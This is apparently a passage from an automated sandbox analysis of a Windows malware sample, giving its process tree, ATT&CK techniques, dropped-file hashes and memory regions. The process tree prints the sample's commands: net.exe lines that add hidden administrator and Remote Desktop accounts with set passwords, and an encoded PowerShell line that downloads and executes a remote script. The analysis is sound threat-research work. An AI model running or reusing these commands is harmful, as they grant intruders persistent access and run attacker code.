PID:684

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
1⤵
PID:568

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
2⤵
PID:1720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TUICJFPF$ /ADD
3⤵
PID:368

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:2016

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" wgautilacc /ADD
2⤵
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
3⤵
PID:804

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc wHLGRkc2
1⤵
PID:1596

C:\Windows\system32\net.exe
net.exe user wgautilacc wHLGRkc2
2⤵
PID:1660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc wHLGRkc2
3⤵
PID:1668

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:348

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:1360

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1448

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:1716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blacklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 1234
1⤵
PID:1900

C:\Windows\system32\net.exe
net user wgautilacc 1234
2⤵
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc 1234
3⤵
PID:884

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7149.tmp
MD5
ec9c9954a08490fcf25d0410a60bf12f

SHA1
3040027fc18fc7d4c19c3986b6a7fb27963428d2

SHA256
f9f6a2f24d18b51a52f871efaf9907140976a9fecb4483dd86792874569cdc10

SHA512
63ca3b23a63524b9e14dbbc7d850a47634d0dbf53b1260c30b977de742042b810292c9895bc3bc3e067b6245de9dea30b87b899cf74c62dffdbbb96485e1d108

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip
MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.dll
MD5
9677a5b063bfa78ab109c8c5ddd13177

SHA1
0472c21031c110dbdc606299592f671c577f3ffb

SHA256
adc62fb603910972deb6c22bee0a16d08626e1883e6a7b6529d58050796d9c17

SHA512
fe966160c0d73d158097c0c0fee842d7a8f3dfcb09ff9c2babd42415ae2e50824937623ca6e1af8c1c56f89910f06ce0b0c5bee2f267a8435434dc3d1b6d6683

Download Submit
C:\Windows\system32\rfxvmt.dll
MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\samr
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\CSC2F104AD658C14F50B898825C301F8E4D.TMP
MD5
b41801b370b1537c73680a8c8f6c230a

SHA1
77ad061d62a4fa4b01d43b65c0c08be0e9e0a91c

SHA256
563acaa2adb416491065a99978821e809b308d0e52181ee112ea932ae550e9ea

SHA512
c2b6e4011c98adcdbd63a9df7c6231a8f81a4e2b07ab31d5517937a8faf7b21a7aa71df474f2867f421f442de402e210e818b14dc17c6bde90065a8ed517df87

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.0.cs
MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\niy0jjqs\niy0jjqs.cmdline
MD5
2e4936ddc36f3626faac240f0b9d32cd

SHA1
468219dba02cd2a98545172f6d3691e291fab533

SHA256
37eac7f8a3e45d12d064cf47b3b25ebdc5f1a98902522b0bb13d80782c4febde

SHA512
bde5e721490986627124fb4be8018479745f78fd9d30004e6787d6cce0060ce53dc6ea1c402d3fad9832fbb8a5fc971ca69ccf8e32e6524e30490ffa44c0dccc

Download Submit
\Windows\Branding\mediasrv.png
MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
\Windows\Branding\mediasvc.png
MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
memory/348-40-0x0000000000000000-mapping.dmp

Download
memory/368-48-0x0000000000000000-mapping.dmp

Download
memory/368-67-0x0000000000000000-mapping.dmp

Download
memory/372-57-0x0000000000000000-mapping.dmp

Download
memory/568-47-0x0000000000000000-mapping.dmp

Download
memory/628-55-0x0000000000000000-mapping.dmp

Download
memory/676-10-0x0000000000000000-mapping.dmp

Download
memory/684-0-0x0000000002220000-0x000000000255D000-memory.dmp

Filesize
3.2MB

Download
memory/684-65-0x0000000000000000-mapping.dmp

Download
memory/684-1-0x0000000002560000-0x0000000002571000-memory.dmp

Filesize
68KB

Download
memory/684-45-0x0000000000000000-mapping.dmp

Download
memory/804-71-0x0000000000000000-mapping.dmp

Download
memory/824-70-0x0000000000000000-mapping.dmp

Download
memory/848-46-0x0000000000000000-mapping.dmp

Download
memory/860-13-0x0000000000000000-mapping.dmp

Download
memory/884-117-0x0000000000000000-mapping.dmp

Download
memory/1072-54-0x0000000000000000-mapping.dmp

Download
memory/1104-64-0x0000000000000000-mapping.dmp

Download
memory/1104-44-0x0000000000000000-mapping.dmp

Download
memory/1152-76-0x0000000000000000-mapping.dmp

Download
memory/1300-34-0x0000000002080000-0x0000000002081000-memory.dmp

Filesize
4KB

Download
memory/1300-2-0x0000000000000000-mapping.dmp

Download
memory/1300-4-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/1300-3-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmp

Filesize
9.9MB

Download
memory/1300-5-0x000000001ACD0000-0x000000001ACD1000-memory.dmp

Filesize
4KB

Download
memory/1300-6-0x00000000020B0000-0x00000000020B1000-memory.dmp

Filesize
4KB

Download
memory/1300-7-0x00000000024C0000-0x00000000024C1000-memory.dmp

Filesize
4KB

Download
memory/1300-9-0x000000001C1C0000-0x000000001C1C1000-memory.dmp

Filesize
4KB

Download
memory/1300-17-0x0000000001F20000-0x0000000001F21000-memory.dmp

Filesize
4KB

Download
memory/1300-18-0x000000001AA90000-0x000000001AA91000-memory.dmp

Filesize
4KB

Download
memory/1300-21-0x000000001B580000-0x000000001B581000-memory.dmp

Filesize
4KB

Download
memory/1300-33-0x0000000002070000-0x0000000002071000-memory.dmp

Filesize
4KB

Download
memory/1300-35-0x0000000024610000-0x0000000024611000-memory.dmp

Filesize
4KB

Download
memory/1332-83-0x000007FEF51D0000-0x000007FEF5BBC000-memory.dmp

Filesize
9.9MB

Download
memory/1332-98-0x0000000000EA0000-0x0000000000EA1000-memory.dmp

Filesize
4KB

Download
memory/1332-86-0x0000000000990000-0x0000000000991000-memory.dmp

Filesize
4KB

Download
memory/1332-115-0x000000001AB20000-0x000000001AB21000-memory.dmp

Filesize
4KB

Download
memory/1332-114-0x0000000019430000-0x0000000019431000-memory.dmp

Filesize
4KB

Download
memory/1332-107-0x000000001AA90000-0x000000001AA91000-memory.dmp

Filesize
4KB

Download
memory/1332-106-0x0000000019FB0000-0x0000000019FB1000-memory.dmp

Filesize
4KB

Download
memory/1332-99-0x00000000011A0000-0x00000000011A1000-memory.dmp

Filesize
4KB

Download
memory/1332-87-0x0000000000A80000-0x0000000000A81000-memory.dmp

Filesize
4KB

Download
memory/1332-82-0x0000000000000000-mapping.dmp

Download
memory/1332-97-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

Filesize
4KB

Download
memory/1332-90-0x0000000001160000-0x0000000001161000-memory.dmp

Filesize
4KB

Download
memory/1332-96-0x0000000000E90000-0x0000000000E91000-memory.dmp

Filesize
4KB

Download
memory/1332-95-0x0000000000E80000-0x0000000000E81000-memory.dmp

Filesize
4KB

Download
memory/1360-43-0x0000000000000000-mapping.dmp

Download
memory/1504-53-0x0000000000000000-mapping.dmp

Download
memory/1512-77-0x0000000000000000-mapping.dmp

Download
memory/1528-56-0x0000000000000000-mapping.dmp

Download
memory/1616-116-0x0000000000000000-mapping.dmp

Download
memory/1620-49-0x0000000000000000-mapping.dmp

Download
memory/1640-41-0x0000000000000000-mapping.dmp

Download
memory/1640-63-0x0000000000000000-mapping.dmp

Download
memory/1660-72-0x0000000000000000-mapping.dmp

Download
memory/1664-60-0x0000000000000000-mapping.dmp

Download
memory/1664-36-0x0000000000000000-mapping.dmp

Download
memory/1668-61-0x0000000000000000-mapping.dmp

Download
memory/1668-73-0x0000000000000000-mapping.dmp

Download
memory/1668-38-0x0000000000000000-mapping.dmp

Download
memory/1716-80-0x0000000000000000-mapping.dmp

Download
memory/1720-66-0x0000000000000000-mapping.dmp

Download
memory/1736-62-0x0000000000000000-mapping.dmp

Download
memory/1740-42-0x0000000000000000-mapping.dmp

Download
memory/1748-79-0x0000000000000000-mapping.dmp

Download
memory/1844-39-0x0000000000000000-mapping.dmp

Download
memory/1908-81-0x0000000000000000-mapping.dmp

Download
memory/1908-50-0x0000000000000000-mapping.dmp

Download
memory/2016-52-0x0000000000000000-mapping.dmp

Download
memory/2036-51-0x0000000000000000-mapping.dmp

Download